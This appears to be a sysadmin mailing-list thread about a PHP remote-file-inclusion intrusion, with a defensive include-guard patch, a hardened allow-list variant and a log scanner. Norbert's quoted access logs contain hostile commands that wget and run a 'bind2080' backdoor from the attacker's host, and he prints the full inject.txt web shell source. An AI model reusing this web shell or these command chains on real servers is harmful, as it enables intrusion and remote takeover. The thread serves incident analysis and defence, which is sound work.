
Re: Hack attempt



Hi Norbert,

I dealt with the exact same intrusion technique on one of the webservers here two weeks ago. They managed to get in and launch a Perl-based IRC bot which was essentially a remote shell. This raised the CPU, which shows up in our server monitoring software, and I managed to detect and stop it before they got root. I had the temp directories set to non-executable, and had some firewall settings so they needed to use a script-interpreted callback technique to really get access (binary executables wouldn't work with the non-exec temp directories).

It was also a file injection. After a while trying to figure out how they were getting in (120+ websites on the machine), I found where they were attacking, and patched the file with:

<?php
// Guard for the "bodyfile" include parameter. $bodyfile comes from
// register_globals in this setup; with it off, read $_GET['bodyfile'] instead.
if (!$bodyfile) {
    $bodyfile = "default"; // change to default body file.
}
else {
    // Any URL scheme (http://, https://, ftp://, ...) means a remote include attempt.
    $ret = strstr($bodyfile, "://");
    if ($ret !== false) {
        echo "Send your message telling them to go away here :)";
        // Dump the request environment (client IP, query string, User-Agent) and mail it.
        $message = print_r($_SERVER, true);
        mail("your@email.com", "Exploit attempt detected", $message);
        exit();
    }
}
?>


An attacker can inject files via PHP's https:// ftp:// http:// streams. This detection stops the attack, prints them a message, and dumps all the server variables in an email.

They were more annoying than anything, so I thought it would be fun to send them a little message upon attack.

It is quite possible to have it execute a suid program to modify your iptables to automatically ban further connections from their address. It's just a neat way to express your annoyance, while gaining some information on the attacker.

The attackers I dealt with were looking to deface the websites, and I managed to track them down (on the web and IRC) to a defacement group out of Brazil, including some home DSL IPs, which probably were their real addresses.
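A hardened variant of the include guard above, added here as an example and not part of the original reply: it reads the parameter explicitly instead of relying on register_globals, rejects any URL scheme or path separator, and then only includes names from a fixed allow-list, so the check no longer depends on spotting "://". The allow-list entries, the bodies/ directory and the alert address are assumptions.

```php
<?php
// Added example (not the poster's patch): resolve the "bodyfile" parameter
// against a fixed allow-list instead of passing it to include(), and alert
// on anything that looks like a stream wrapper or path traversal.

$allowed_bodies = array('default', 'about', 'contact'); // assumed body names
$body_dir       = __DIR__ . '/bodies';                  // assumed directory of body fragments
$alert_to       = 'webmaster@example.invalid';          // placeholder address

function report_and_exit($reason)
{
    // Same idea as the poster's patch: keep the request details, refuse to include.
    $message = $reason . "\n\n" . print_r($_SERVER, true);
    error_log('Exploit attempt detected: ' . $reason);
    @mail($GLOBALS['alert_to'], 'Exploit attempt detected', $message);
    header('HTTP/1.0 400 Bad Request');
    exit();
}

// Never trust register_globals; read the parameter explicitly.
$bodyfile = isset($_GET['bodyfile']) ? (string) $_GET['bodyfile'] : 'default';

// Reject any "scheme:" prefix (http://, ftp://, php://, ...) and any path
// separator or NUL before touching the filesystem.
if (preg_match('#^[a-z0-9.+-]+:#i', $bodyfile) || strpbrk($bodyfile, "/\\\0") !== false) {
    report_and_exit('bodyfile contains a URL scheme or path separator: ' . $bodyfile);
}

// The allow-list is the real control; the pattern above exists only for alerting.
if (!in_array($bodyfile, $allowed_bodies, true)) {
    report_and_exit('bodyfile not in allow-list: ' . $bodyfile);
}

include $body_dir . '/' . $bodyfile . '.php';
?>
```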

Norbert Crettol wrote:

Hi all.

This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).

We've had an undesired visitor, last night, that I discovered in the reports of tripwire.

Here are the logs we got (we get a remote copy of the web server logs
in another host). As of the second line, I've stripped the head and the tail of the line which is always the same.
--- begin ---
"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
--- end ---
I've seen no other


It looks like bind8080 has created a directory /var/lock/.tmp and expanded an archive (owned by the web server owner) there. Here
is the list of the files:
3225 jui 20 03:53 c-leet
15 jui 20 03:47 c-leet.dir
51 jui 20 03:47 cron.d
512 mai 12 2002 doc/
14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
2523568 mai 12 2002 eggdrop-1.6.10*
512 mai 12 2002 filesys/
343 fév 11 03:55 fuck*
512 mai 12 2002 help/
21149 nov 4 2003 kik*
1024 jui 21 11:00 language/
512 mai 12 2002 logs/
6 jui 20 03:48 pid.CaEm-
23065 jan 29 15:00 proc*
6 jui 20 03:48 psybnc.pid
28591 mai 12 2002 README
89 jui 20 03:53 run*
588 avr 1 10:00 run-*
708 avr 1 10:00 run--*
512 mar 31 08:12 scripts/
512 mai 12 2002 text/
2523568 mar 28 01:41 vi*
30293 nov 17 2002 xhide*
182 jui 20 03:47 y2kupdate*


Here is the content of http://www.bosscalvin.com/inject.txt :
--- begin ---
<font color="red">
<br><font face="Comic Sans MS" size="2"><center>
<b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>SecurityCorp</b><br>
<b>#</b> Edited by CaEm
<br>
<br>
<hr color="red" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="red" width=751px height=115px>
<br>
<font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
--- end ---

Has someone seen this kind of attack? (chkrootkit doesn't detect it.)
Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
Is there a way to stop this guy? His nickname (CaEm) appears in the uploaded scripts.


Norbert
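To find which script on a multi-site host is being hit, as the reply describes doing across 120+ sites, here is an added PHP CLI example (not from the thread) that scans Apache combined-log lines for query parameters carrying a URL, the signature visible in Norbert's logs, and reports the target script together with any accompanying cmd value. The sample lines are constructed, modelled on the posted logs, with a placeholder attacker host.

```php
<?php
// Added example, not from the thread: scan Apache combined-log lines for
// remote-file-inclusion attempts (a query parameter whose value is a URL)
// and report the script being hit, so the vulnerable file can be located.

// Constructed sample lines modelled on the ones Norbert posted.
$sample_log = <<<'LOG'
10.0.0.1 - - [20/Jul/2004:03:40:01 +0200] "GET /site1/index.php?bodyfile=http://attacker.invalid/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:40:05 +0200] "GET /site1/index.php?bodyfile=http://attacker.invalid/inject.txt?&cmd=uname%20-a HTTP/1.0" 200 6640 "-" "Mozilla/4.0"
10.0.0.2 - - [20/Jul/2004:03:41:10 +0200] "GET /site1/index.php?bodyfile=default HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
10.0.0.1 - - [20/Jul/2004:03:42:00 +0200] "GET /site2/page.php?page=ftp://attacker.invalid/i.txt HTTP/1.0" 200 300 "-" "Mozilla/4.0"
LOG;

function find_rfi_attempts($log_text)
{
    $hits = array();
    foreach (explode("\n", $log_text) as $line) {
        // Pull the client address and the request target out of the log line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $client = $m[1];
        $parts  = parse_url($m[2]);
        if (empty($parts['query'])) {
            continue;
        }
        parse_str($parts['query'], $params);
        foreach ($params as $name => $value) {
            // A parameter value carrying a URL scheme is the RFI signature from the thread.
            if (is_string($value) && preg_match('#^(https?|ftp)://#i', $value)) {
                $hits[] = array(
                    'client' => $client,
                    'script' => $parts['path'],
                    'param'  => $name,
                    'url'    => $value,
                    'cmd'    => isset($params['cmd']) ? $params['cmd'] : null,
                );
            }
        }
    }
    return $hits;
}

foreach (find_rfi_attempts($sample_log) as $h) {
    printf("%s -> %s via %s=%s cmd=%s\n", $h['client'], $h['script'], $h['param'], $h['url'], $h['cmd']);
}
?>
```

Run against a real access log by replacing $sample_log with file_get_contents() of the log; the third sample line (a plain bodyfile=default request) produces no hit.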